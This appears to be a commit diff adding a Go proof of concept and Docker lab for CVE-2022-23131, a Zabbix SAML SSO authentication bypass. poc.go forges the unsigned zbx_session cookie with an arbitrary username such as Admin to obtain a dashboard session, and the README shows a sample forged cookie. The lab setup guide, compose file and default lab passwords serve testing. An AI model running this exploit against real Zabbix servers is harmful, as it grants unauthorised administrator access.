add CVE-2022-23131 poc、漏洞环境

00-CVE_EXP/CVE-2022-23131/README.md

@@ -0,0 +1,18 @@
+# Zabbix SAML SSO Login Bypass Vulnerability CVE-2022-23131
+
+Environment and Poc of CVE-2022-23131
+
+## Environment
+
+[Environment setup](漏洞环境搭建)
+
+## Poc
+
+Usage:
+
+```bash
+go run poc.go check -t http://localhost:8080 -u Admin
+
+[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9
+```
+

00-CVE_EXP/CVE-2022-23131/go.mod

@@ -0,0 +1,23 @@
+module main
+
+go 1.17
+
+require (
+	github.com/kataras/golog v0.1.7
+	github.com/urfave/cli/v2 v2.3.0
+	github.com/xiecat/xhttp v0.0.0-20220117022559-2545617efd91
+)
+
+require (
+	github.com/cpuguy83/go-md2man/v2 v2.0.0-20190314233015-f79a8a8ca69d // indirect
+	github.com/kataras/pio v0.0.10 // indirect
+	github.com/russross/blackfriday/v2 v2.0.1 // indirect
+	github.com/shurcooL/sanitized_anchor_name v1.0.0 // indirect
+	github.com/thoas/go-funk v0.9.1 // indirect
+	golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83 // indirect
+	golang.org/x/net v0.0.0-20220114011407-0dd24b26b47d // indirect
+	golang.org/x/sys v0.0.0-20210423082822-04245dca01da // indirect
+	golang.org/x/text v0.3.6 // indirect
+	golang.org/x/time v0.0.0-20211116232009-f0f3c7e86c11 // indirect
+	software.sslmate.com/src/go-pkcs12 v0.0.0-20210415151418-c5206de65a78 // indirect
+)

00-CVE_EXP/CVE-2022-23131/go.sum

@@ -0,0 +1,51 @@
+github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
+github.com/cpuguy83/go-md2man/v2 v2.0.0-20190314233015-f79a8a8ca69d h1:U+s90UTSYgptZMwQh2aRr3LuazLJIa+Pg3Kc1ylSYVY=
+github.com/cpuguy83/go-md2man/v2 v2.0.0-20190314233015-f79a8a8ca69d/go.mod h1:maD7wRr/U5Z6m/iR4s+kqSMx2CaBsrgA7czyZG/E6dU=
+github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8=
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/kataras/golog v0.1.7 h1:0TY5tHn5L5DlRIikepcaRR/6oInIr9AiWsxzt0vvlBE=
+github.com/kataras/golog v0.1.7/go.mod h1:jOSQ+C5fUqsNSwurB/oAHq1IFSb0KI3l6GMa7xB6dZA=
+github.com/kataras/pio v0.0.10 h1:b0qtPUqOpM2O+bqa5wr2O6dN4cQNwSmFd6HQqgVae0g=
+github.com/kataras/pio v0.0.10/go.mod h1:gS3ui9xSD+lAUpbYnjOGiQyY7sUMJO+EHpiRzhtZ5no=
+github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/russross/blackfriday/v2 v2.0.1 h1:lPqVAte+HuHNfhJ/0LC98ESWRz8afy9tM/0RK8m9o+Q=
+github.com/russross/blackfriday/v2 v2.0.1/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=
+github.com/shurcooL/sanitized_anchor_name v1.0.0 h1:PdmoCO6wvbs+7yrJyMORt4/BmY5IYyJwS/kOiWx8mHo=
+github.com/shurcooL/sanitized_anchor_name v1.0.0/go.mod h1:1NzhyTcUVG4SuEtjjoZeVRXNmyL/1OwPU0+IJeTBvfc=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4=
+github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY=
+github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/thoas/go-funk v0.9.1 h1:O549iLZqPpTUQ10ykd26sZhzD+rmR5pWhuElrhbC20M=
+github.com/thoas/go-funk v0.9.1/go.mod h1:+IWnUfUmFO1+WVYQWQtIJHeRRdaIyyYglZN7xzUPe4Q=
+github.com/urfave/cli/v2 v2.3.0 h1:qph92Y649prgesehzOrQjdWyxFOp/QVM+6imKHad91M=
+github.com/urfave/cli/v2 v2.3.0/go.mod h1:LJmUH05zAU44vOAcrfzZQKsZbVcdbOG8rtL3/XcUArI=
+github.com/xiecat/xhttp v0.0.0-20220117022559-2545617efd91 h1:EON4QnnRXCG8o2U/XYJGWD5U1nd6THt0/6rG+7c2/vg=
+github.com/xiecat/xhttp v0.0.0-20220117022559-2545617efd91/go.mod h1:UnSHXKfwJ1th2smyjlO2FG3i4PvD1/OxXN0UE7dI3yQ=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83 h1:/ZScEX8SfEmUGRHs0gxpqteO5nfNW6axyZbBdw9A12g=
+golang.org/x/crypto v0.0.0-20210220033148-5ea612d1eb83/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20220114011407-0dd24b26b47d h1:1n1fc535VhN8SYtD4cDUyNlfpAF2ROMM9+11equK3hs=
+golang.org/x/net v0.0.0-20220114011407-0dd24b26b47d/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da h1:b3NXsE2LusjYGGjL5bxEVZZORm/YEFFrWFjR8eFrw/c=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/term v0.0.0-20201117132131-f5c789dd3221/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw=
+golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M=
+golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
+golang.org/x/time v0.0.0-20211116232009-f0f3c7e86c11 h1:GZokNIeuVkl3aZHJchRrr13WCsols02MLUcz1U9is6M=
+golang.org/x/time v0.0.0-20211116232009-f0f3c7e86c11/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
+golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
+gopkg.in/yaml.v2 v2.2.3/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+software.sslmate.com/src/go-pkcs12 v0.0.0-20210415151418-c5206de65a78 h1:SqYE5+A2qvRhErbsXFfUEUmpWEKxxRSMgGLkvRAFOV4=
+software.sslmate.com/src/go-pkcs12 v0.0.0-20210415151418-c5206de65a78/go.mod h1:B7Wf0Ya4DHF9Yw+qfZuJijQYkWicqDa+79Ytmmq3Kjg=

00-CVE_EXP/CVE-2022-23131/poc.go

@@ -0,0 +1,129 @@
+package main
+
+/*
+ * Zabbix SAML SSO Bypass Vulnerability(CVE-2022-23131) Check POC
+ */
+import (
+	"bytes"
+	"context"
+	"encoding/base64"
+	"encoding/json"
+	"net/http"
+	"net/url"
+	"os"
+
+	"github.com/kataras/golog"
+	"github.com/urfave/cli/v2"
+	"github.com/xiecat/xhttp"
+)
+
+func main() {
+	app := &cli.App{
+		Name:  "zabbix saml bypass self-check tool",
+		Usage: "zabbix poc toooooooools",
+		Commands: []*cli.Command{
+			{
+				Name:    "check",
+				Aliases: []string{"c"},
+				Usage:   "check multi assets",
+				Flags: []cli.Flag{
+					&cli.StringFlag{
+						Name:     "target",
+						Aliases:  []string{"t"},
+						Usage:    "target for check",
+						Required: true,
+					},
+					&cli.StringFlag{
+						Name:     "username",
+						Aliases:  []string{"u"},
+						Usage:    "default username",
+						Required: true,
+					},
+				},
+				Action: func(c *cli.Context) error {
+					target := c.String("target")
+					req, err := http.NewRequest("GET", target, nil)
+					if err != nil {
+						return err
+					}
+					defaultUsername := c.String("username")
+					if defaultUsername == "" {
+						defaultUsername = "Admin"
+					}
+					if result, cookie := exp(req, defaultUsername); result {
+						golog.Infof("vul exist! target: %s, cookie: %s", target, cookie)
+					}
+					return nil
+				},
+			},
+		},
+	}
+	err := app.Run(os.Args)
+	if err != nil {
+		golog.Fatal(err)
+	}
+}
+
+func exp(req *http.Request, defaultName string) (bool, string) {
+	c, err := xhttp.NewDefaultClient(nil)
+	if err != nil {
+		return false, ""
+	}
+	xReq := &xhttp.Request{RawRequest: req}
+	ctx := context.Background()
+
+	resp, err := c.Do(ctx, xReq)
+	if err != nil {
+		return false, ""
+	}
+
+	if !bytes.Contains(resp.Body, []byte("SAML")) {
+		return false, ""
+	}
+	mayVul := false
+	var cookie *http.Cookie
+	for _, c := range resp.RawResponse.Cookies() {
+		if c.Name == "zbx_session" {
+			mayVul = true
+			cookie = c
+			break
+		}
+	}
+	if !mayVul {
+		return false, ""
+	}
+
+	zabbixSession, err := url.PathUnescape(cookie.Value)
+	if err != nil {
+		return false, ""
+	}
+	zabbixSessionBytes, err := base64.StdEncoding.DecodeString(zabbixSession)
+	if err != nil {
+		return false, ""
+	}
+	sign := make(map[string]interface{})
+	err = json.Unmarshal(zabbixSessionBytes, &sign)
+	if err != nil {
+		return false, ""
+	}
+	sign["saml_data"] = map[string]string{
+		"username_attribute": defaultName,
+	}
+	signBytes, err := json.Marshal(sign)
+	if err != nil {
+		return false, ""
+	}
+	cookie.Value = url.PathEscape(base64.StdEncoding.EncodeToString(signBytes))
+	xReq.RawRequest.AddCookie(cookie)
+	xReq.RawRequest.URL.Path = "/index_sso.php"
+
+	resp, err = c.Do(ctx, xReq)
+	if err != nil {
+		return false, ""
+	}
+	if resp.GetStatus() == 302 && resp.GetHeaders().Get("Location") == "zabbix.php?action=dashboard.view" {
+		// return cookie.Value (payload) otherwise cookie.Row
+		return true, cookie.Value
+	}
+	return false, ""
+}

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/README.md

@@ -0,0 +1,159 @@
+# Zabbix Environment for CVE-2022-23131
+
+In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
+
+## Affected Version
+
+| CVE            | Range                      |
+|----------------|----------------------------|
+| CVE-2022-23131 | [5.4.0, 5.4.8] 6.0.0alpha1 |
+
+## Usage
+
+Run following command to startup the zabbix
+
+```bash
+docker-compose up
+```
+
+## Configure SAML SSO for Zabbix
+
+**Remember, this step is a little tedious, and I have no way to auto-configure it right now.**
+
+In this case, we use [keycloak](https://www.keycloak.org/) as the SSO server for `Zabbix`.
+
+### Step 1 Create the crt file from IDP metadata
+
+Access `http://localhost` with your brower, and login `keycloak` with
+
+```
+username: admin
+password: admin
+```
+
+> We use default relam (`Master`) here.
+
+Now, access the `http://localhost/realms/master/protocol/saml/descriptor`, or you can access this url by
+
+```
+Main Page -> Realm Settings -> General -> Endpoints -> click `SAML 2.0 Identify Provider Metadata`
+```
+
+Create a file with name `ipd.crt` in `./zbx_env/usr/share/zabbix/conf/certs/`
+
+Copy the content you got form the above site to this file
+
+```
+# ipd.crt
+-----BEGIN CERTIFICATE-----
+<content of tag `ds:X509Certificate`>
+-----END CERTIFICATE-----
+```
+
+and run
+
+```bash
+chmod 644 idp.crt
+chmod +x idp.crt
+```
+
+Then we create a certificate `sp.key` and `sp.crt` for `zabbix` in the same folder
+
+```bash
+openssl req -x509 -sha256 -newkey rsa:2048 -keyout sp.key -out sp.crt -days 3650 -nodes -subj '/CN=my common name'
+```
+
+### Step 2 Create A Client in Keycloak
+
+Back to main page and click `Client` on left sidebar. Create a new client
+
+```
+Client ID: zabbix
+Client Protocol: saml
+Master SAML Processing URL: http://localhost:8080/index_sso.php?acs
+```
+
+and save.
+
+After that, configure the client with
+
+```
+IDP Initiated SSO URL Name: zabbix
+```
+
+Open `Fine Grain SAML Endpoint Configuration`
+
+```
+Logout Service Redirect Binding URL: http://localhost:8080/index_sso.php?sls
+```
+
+click save again.
+
+Go to the `Mapper` of the client we just created, create a new mapper with
+
+```
+Name: zabbixuser
+Mapper Type: User Attribute
+User Attribute: zabbixuser
+Friendly Name: zabbixuser
+SAML Attribute Name: zabbixuser
+```
+
+and save it.
+
+Back to the main page
+
+```
+Main page -> Client Scopes -> role_list -> Mapper
+```
+
+click the `role list` and open `Single Role Attribute`, after that save it.
+
+### Step 3 Association with The User Attribute
+
+Go to
+
+```
+Main page -> User -> View all users
+```
+
+Choose the user you want, in this case, is `admin`
+
+Click the `Attributes`, add a new one with
+
+```
+Key: zabbixuser
+Value: <username of zabbix, you can use `Admin` here>
+```
+
+### Step 4 Configuration Zabbix with SAML SSO
+
+Access `http://localhost:8080` and login with
+
+```
+Username: Admin
+Password: zabbix
+```
+
+Click 
+
+```
+Adminstration -> Authentication -> SAML settings
+```
+
+and configure with
+
+```
+IdP entity ID: http://localhost/realms/master
+SSO service URL: http://localhost/realms/master/protocol/saml/clients/zabbix
+Username attribute: zabbixuser
+SP entity ID: zabbix
+```
+
+click `Update`.
+
+After these step, you have finished the configuration of `Zabbix` with `SAML SSO`. And you can choose `Sign in with Single Sign-On (SAML)` when you want to login `Zabbix`.
+
+# Reference
+
+1. https://support.zabbix.com/browse/ZBX-20350

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/docker-compose.yml

@@ -0,0 +1,462 @@
+version: '3.5'
+services:
+ keycloak:
+  image: quay.io/keycloak/keycloak:17.0.0
+  environment:
+   - KEYCLOAK_ADMIN=admin
+   - KEYCLOAK_ADMIN_PASSWORD=admin
+  ports:
+   - "80:8080"
+  command: start-dev
+
+ zabbix-server:
+  image: zabbix/zabbix-server-mysql:ubuntu-5.4.0
+  ports:
+   - "10051:10051"
+  volumes:
+   - /etc/localtime:/etc/localtime:ro
+   - ./zbx_env/usr/lib/zabbix/alertscripts:/usr/lib/zabbix/alertscripts:ro
+   - ./zbx_env/usr/lib/zabbix/externalscripts:/usr/lib/zabbix/externalscripts:ro
+   - ./zbx_env/var/lib/zabbix/export:/var/lib/zabbix/export:rw
+   - ./zbx_env/var/lib/zabbix/modules:/var/lib/zabbix/modules:ro
+   - ./zbx_env/var/lib/zabbix/enc:/var/lib/zabbix/enc:ro
+   - ./zbx_env/var/lib/zabbix/ssh_keys:/var/lib/zabbix/ssh_keys:ro
+   - ./zbx_env/var/lib/zabbix/mibs:/var/lib/zabbix/mibs:ro
+   - snmptraps:/var/lib/zabbix/snmptraps:rw
+  ulimits:
+   nproc: 65535
+   nofile:
+    soft: 20000
+    hard: 40000
+  deploy:
+   resources:
+    limits:
+      cpus: '0.70'
+      memory: 1G
+    reservations:
+      cpus: '0.5'
+      memory: 512M
+  env_file:
+   - env_vars/.env_db_mysql
+   - env_vars/.env_srv
+  secrets:
+   - MYSQL_USER
+   - MYSQL_PASSWORD
+   - MYSQL_ROOT_PASSWORD
+  depends_on:
+   - mysql-server
+   - keycloak
+  networks:
+   zbx_net_backend:
+     aliases:
+      - zabbix-server
+      - zabbix-server-mysql
+      - zabbix-server-ubuntu-mysql
+      - zabbix-server-mysql-ubuntu
+   zbx_net_frontend:
+#  devices:
+#   - "/dev/ttyUSB0:/dev/ttyUSB0"
+  stop_grace_period: 30s
+  sysctls:
+   - net.ipv4.ip_local_port_range=1024 65000
+   - net.ipv4.conf.all.accept_redirects=0
+   - net.ipv4.conf.all.secure_redirects=0
+   - net.ipv4.conf.all.send_redirects=0
+  labels:
+   com.zabbix.description: "Zabbix server with MySQL database support"
+   com.zabbix.company: "Zabbix LLC"
+   com.zabbix.component: "zabbix-server"
+   com.zabbix.dbtype: "mysql"
+   com.zabbix.os: "ubuntu"
+
+ zabbix-proxy-sqlite3:
+  image: zabbix/zabbix-proxy-sqlite3:ubuntu-latest
+  profiles:
+   - all
+  ports:
+   - "10061:10051"
+  volumes:
+   - /etc/localtime:/etc/localtime:ro
+   - ./zbx_env/usr/lib/zabbix/externalscripts:/usr/lib/zabbix/externalscripts:ro
+   - ./zbx_env/var/lib/zabbix/modules:/var/lib/zabbix/modules:ro
+   - ./zbx_env/var/lib/zabbix/enc:/var/lib/zabbix/enc:ro
+   - ./zbx_env/var/lib/zabbix/ssh_keys:/var/lib/zabbix/ssh_keys:ro
+   - ./zbx_env/var/lib/zabbix/mibs:/var/lib/zabbix/mibs:ro
+   - snmptraps:/var/lib/zabbix/snmptraps:rw
+  ulimits:
+   nproc: 65535
+   nofile:
+    soft: 20000
+    hard: 40000
+  deploy:
+   resources:
+    limits:
+      cpus: '0.70'
+      memory: 512M
+    reservations:
+      cpus: '0.3'
+      memory: 256M
+  env_file:
+   - env_vars/.env_prx
+   - env_vars/.env_prx_sqlite3
+  depends_on:
+   - zabbix-java-gateway
+   - zabbix-snmptraps
+  networks:
+   zbx_net_backend:
+    aliases:
+     - zabbix-proxy-sqlite3
+     - zabbix-proxy-ubuntu-sqlite3
+     - zabbix-proxy-sqlite3-ubuntu
+   zbx_net_frontend:
+  stop_grace_period: 30s
+  labels:
+   com.zabbix.description: "Zabbix proxy with SQLite3 database support"
+   com.zabbix.company: "Zabbix LLC"
+   com.zabbix.component: "zabbix-proxy"
+   com.zabbix.dbtype: "sqlite3"
+   com.zabbix.os: "ubuntu"
+
+ zabbix-proxy-mysql:
+  image: zabbix/zabbix-proxy-mysql:ubuntu-5.4.0
+  profiles:
+   - all
+  ports:
+   - "10071:10051"
+  volumes:
+   - /etc/localtime:/etc/localtime:ro
+   - ./zbx_env/usr/lib/zabbix/externalscripts:/usr/lib/zabbix/externalscripts:ro
+   - ./zbx_env/var/lib/zabbix/modules:/var/lib/zabbix/modules:ro
+   - ./zbx_env/var/lib/zabbix/enc:/var/lib/zabbix/enc:ro
+   - ./zbx_env/var/lib/zabbix/ssh_keys:/var/lib/zabbix/ssh_keys:ro
+   - ./zbx_env/var/lib/zabbix/mibs:/var/lib/zabbix/mibs:ro
+   - snmptraps:/var/lib/zabbix/snmptraps:rw
+  ulimits:
+   nproc: 65535
+   nofile:
+    soft: 20000
+    hard: 40000
+  deploy:
+   resources:
+    limits:
+      cpus: '0.70'
+      memory: 512M
+    reservations:
+      cpus: '0.3'
+      memory: 256M
+  env_file:
+   - env_vars/.env_db_mysql_proxy
+   - env_vars/.env_prx
+   - env_vars/.env_prx_mysql
+  depends_on:
+   - mysql-server
+  secrets:
+   - MYSQL_USER
+   - MYSQL_PASSWORD
+   - MYSQL_ROOT_PASSWORD
+  networks:
+   zbx_net_backend:
+    aliases:
+     - zabbix-proxy-mysql
+     - zabbix-proxy-ubuntu-mysql
+     - zabbix-proxy-mysql-ubuntu
+   zbx_net_frontend:
+  stop_grace_period: 30s
+  labels:
+   com.zabbix.description: "Zabbix proxy with MySQL database support"
+   com.zabbix.company: "Zabbix LLC"
+   com.zabbix.component: "zabbix-proxy"
+   com.zabbix.dbtype: "mysql"
+   com.zabbix.os: "ubuntu"
+
+ zabbix-web-apache-mysql:
+  image: zabbix/zabbix-web-apache-mysql:ubuntu-5.4.0
+  profiles:
+   - all
+  ports:
+   - "8081:8080"
+   - "8443:8443"
+  volumes:
+   - /etc/localtime:/etc/localtime:ro
+   - ./zbx_env/etc/ssl/apache2:/etc/ssl/apache2:ro
+   - ./zbx_env/usr/share/zabbix/modules/:/usr/share/zabbix/modules/:ro
+  deploy:
+   resources:
+    limits:
+      cpus: '0.70'
+      memory: 512M
+    reservations:
+      cpus: '0.5'
+      memory: 256M
+  env_file:
+   - env_vars/.env_db_mysql
+   - env_vars/.env_web
+  secrets:
+   - MYSQL_USER
+   - MYSQL_PASSWORD
+  depends_on:
+   - mysql-server
+   - zabbix-server
+  healthcheck:
+   test: ["CMD", "curl", "-f", "http://localhost:8080/"]
+   interval: 10s
+   timeout: 5s
+   retries: 3
+   start_period: 30s
+  networks:
+   zbx_net_backend:
+    aliases:
+     - zabbix-web-apache-mysql
+     - zabbix-web-apache-ubuntu-mysql
+     - zabbix-web-apache-mysql-ubuntu
+   zbx_net_frontend:
+  stop_grace_period: 10s
+  sysctls:
+   - net.core.somaxconn=65535
+  labels:
+   com.zabbix.description: "Zabbix frontend on Apache web-server with MySQL database support"
+   com.zabbix.company: "Zabbix LLC"
+   com.zabbix.component: "zabbix-frontend"
+   com.zabbix.webserver: "apache2"
+   com.zabbix.dbtype: "mysql"
+   com.zabbix.os: "ubuntu"
+
+ zabbix-web-nginx-mysql:
+  image: zabbix/zabbix-web-nginx-mysql:ubuntu-5.4.0
+  ports:
+   - "8080:8080"
+   - "443:8443"
+  volumes:
+   - /etc/localtime:/etc/localtime:ro
+   - ./zbx_env/etc/ssl/nginx:/etc/ssl/nginx:ro
+   - ./zbx_env/usr/share/zabbix/modules/:/usr/share/zabbix/modules/:ro
+   - ./zbx_env/usr/share/zabbix/conf/certs/:/etc/zabbix/web/certs:ro
+  deploy:
+   resources:
+    limits:
+      cpus: '0.70'
+      memory: 512M
+    reservations:
+      cpus: '0.5'
+      memory: 256M
+  env_file:
+   - env_vars/.env_db_mysql
+   - env_vars/.env_web
+  secrets:
+   - MYSQL_USER
+   - MYSQL_PASSWORD
+  depends_on:
+   - mysql-server
+   - zabbix-server
+  healthcheck:
+   test: ["CMD", "curl", "-f", "http://localhost:8080/"]
+   interval: 10s
+   timeout: 5s
+   retries: 3
+   start_period: 30s
+  networks:
+   zbx_net_backend:
+    aliases:
+     - zabbix-web-nginx-mysql
+     - zabbix-web-nginx-ubuntu-mysql
+     - zabbix-web-nginx-mysql-ubuntu
+   zbx_net_frontend:
+  stop_grace_period: 10s
+  sysctls:
+   - net.core.somaxconn=65535
+  labels:
+   com.zabbix.description: "Zabbix frontend on Nginx web-server with MySQL database support"
+   com.zabbix.company: "Zabbix LLC"
+   com.zabbix.component: "zabbix-frontend"
+   com.zabbix.webserver: "nginx"
+   com.zabbix.dbtype: "mysql"
+   com.zabbix.os: "ubuntu"
+
+ zabbix-agent:
+  image: zabbix/zabbix-agent:ubuntu-5.4.0
+  profiles:
+   - full
+   - all
+  ports:
+   - "10050:10050"
+  volumes:
+   - /etc/localtime:/etc/localtime:ro
+   - ./zbx_env/etc/zabbix/zabbix_agentd.d:/etc/zabbix/zabbix_agentd.d:ro
+   - ./zbx_env/var/lib/zabbix/modules:/var/lib/zabbix/modules:ro
+   - ./zbx_env/var/lib/zabbix/enc:/var/lib/zabbix/enc:ro
+   - ./zbx_env/var/lib/zabbix/ssh_keys:/var/lib/zabbix/ssh_keys:ro
+  deploy:
+   resources:
+    limits:
+      cpus: '0.2'
+      memory: 128M
+    reservations:
+      cpus: '0.1'
+      memory: 64M
+   mode: global
+  env_file:
+   - env_vars/.env_agent
+  privileged: true
+  pid: "host"
+  networks:
+   zbx_net_backend:
+    aliases:
+     - zabbix-agent
+     - zabbix-agent-passive
+     - zabbix-agent-ubuntu
+  stop_grace_period: 5s
+  labels:
+   com.zabbix.description: "Zabbix agent"
+   com.zabbix.company: "Zabbix LLC"
+   com.zabbix.component: "zabbix-agentd"
+   com.zabbix.os: "ubuntu"
+
+ zabbix-java-gateway:
+  image: zabbix/zabbix-java-gateway:ubuntu-5.4.0
+  profiles:
+   - full
+   - all
+  ports:
+   - "10052:10052"
+  deploy:
+   resources:
+    limits:
+      cpus: '0.5'
+      memory: 512M
+    reservations:
+      cpus: '0.25'
+      memory: 256M
+  env_file:
+   - env_vars/.env_java
+  networks:
+   zbx_net_backend:
+    aliases:
+     - zabbix-java-gateway
+     - zabbix-java-gateway-ubuntu
+  stop_grace_period: 5s
+  labels:
+   com.zabbix.description: "Zabbix Java Gateway"
+   com.zabbix.company: "Zabbix LLC"
+   com.zabbix.component: "java-gateway"
+   com.zabbix.os: "ubuntu"
+
+ zabbix-snmptraps:
+  image: zabbix/zabbix-snmptraps:ubuntu-5.4.0
+  profiles:
+   - full
+   - all
+  ports:
+   - "162:1162/udp"
+  volumes:
+   - snmptraps:/var/lib/zabbix/snmptraps:rw
+  deploy:
+   resources:
+    limits:
+      cpus: '0.5'
+      memory: 256M
+    reservations:
+      cpus: '0.25'
+      memory: 128M
+  networks:
+   zbx_net_frontend:
+    aliases:
+     - zabbix-snmptraps
+   zbx_net_backend:
+  stop_grace_period: 5s
+  labels:
+   com.zabbix.description: "Zabbix snmptraps"
+   com.zabbix.company: "Zabbix LLC"
+   com.zabbix.component: "snmptraps"
+   com.zabbix.os: "ubuntu"
+
+ zabbix-web-service:
+  image: zabbix/zabbix-web-service:ubuntu-5.4.0
+  profiles:
+   - full
+   - all
+  ports:
+   - "10053:10053"
+  volumes:
+   - ./zbx_env/var/lib/zabbix/enc:/var/lib/zabbix/enc:ro
+  cap_add:
+   - SYS_ADMIN
+  deploy:
+   resources:
+    limits:
+      cpus: '0.5'
+      memory: 512M
+    reservations:
+      cpus: '0.25'
+      memory: 256M
+  env_file:
+   - env_vars/.env_web_service
+  networks:
+   zbx_net_backend:
+    aliases:
+     - zabbix-web-service
+     - zabbix-web-service-ubuntu
+  stop_grace_period: 5s
+  labels:
+   com.zabbix.description: "Zabbix web service"
+   com.zabbix.company: "Zabbix LLC"
+   com.zabbix.component: "web-service"
+   com.zabbix.os: "ubuntu"
+
+ mysql-server:
+  image: mysql:oracle
+  command:
+   - mysqld
+   - --character-set-server=utf8
+   - --collation-server=utf8_bin
+   - --default-authentication-plugin=mysql_native_password
+  volumes:
+   - ./zbx_env/var/lib/mysql:/var/lib/mysql:rw
+  env_file:
+   - env_vars/.env_db_mysql
+  secrets:
+   - MYSQL_USER
+   - MYSQL_PASSWORD
+   - MYSQL_ROOT_PASSWORD
+  stop_grace_period: 1m
+  networks:
+   zbx_net_backend:
+    aliases:
+     - mysql-server
+     - zabbix-database
+     - mysql-database
+
+ db_data_mysql:
+  image: busybox
+  volumes:
+   - ./zbx_env/var/lib/mysql:/var/lib/mysql:rw
+
+networks:
+  zbx_net_frontend:
+    driver: bridge
+    driver_opts:
+      com.docker.network.enable_ipv6: "false"
+    ipam:
+      driver: default
+      config:
+      - subnet: 172.16.238.0/24
+  zbx_net_backend:
+    driver: bridge
+    driver_opts:
+      com.docker.network.enable_ipv6: "false"
+    internal: true
+    ipam:
+      driver: default
+      config:
+      - subnet: 172.16.239.0/24
+
+volumes:
+  snmptraps:
+
+secrets:
+  MYSQL_USER:
+    file: ./env_vars/.MYSQL_USER
+  MYSQL_PASSWORD:
+    file: ./env_vars/.MYSQL_PASSWORD
+  MYSQL_ROOT_PASSWORD:
+    file: ./env_vars/.MYSQL_ROOT_PASSWORD
+

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.MYSQL_PASSWORD

@@ -0,0 +1 @@
+zabbix

00-CVE_EXP/CVE-2022-23131/漏洞环境搭建/env_vars/.MYSQL_ROOT_PASSWORD

@@ -0,0 +1 @@
+root_pwd

